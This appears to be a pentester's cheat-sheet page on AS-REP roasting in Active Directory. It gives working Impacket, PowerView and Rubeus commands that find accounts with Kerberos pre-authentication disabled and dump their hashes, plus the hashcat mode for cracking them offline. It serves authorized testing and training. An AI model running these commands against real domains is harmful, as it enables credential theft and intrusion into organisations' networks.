⌘Ctrlk

asrep roasting

AS-REP Roasting works only for users with Kerberos pre-authentication disabled

Dumps the krbasrep5 hashes of user accounts
If pre-authentication is disabled, you can request any authentication data for any user and the KDC will return an encrypted TGT that can be cracked offline because the KDC skips the step of validating that the user is really who they say that they are.
This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Usage

using impacket

# Enumerate the users > user.txt
impacket-GetNPUsers DOMAIN/ -usersfile user.txt -format hashcat [-outputfile hash]
impacket-GetNPUsers DOMAIN/USER -no-pass -dc-ip IP -format hashcat
impacket-GetNPUsers -dc-ip IP -request DOMAIN/
# hashcat -m 18200

using powerview

Get-DomainUser -PreauthNotRequired -Verbose

using rubeus

Rubeus.exe asreproast /format:hashcat /domain:DOMAIN [/outfile:FILE]
# add $23 after $krb5asrep$
# hashcat -m 18200

Previouskerberos 101 Nextkerberoasting

Last updated 4 years ago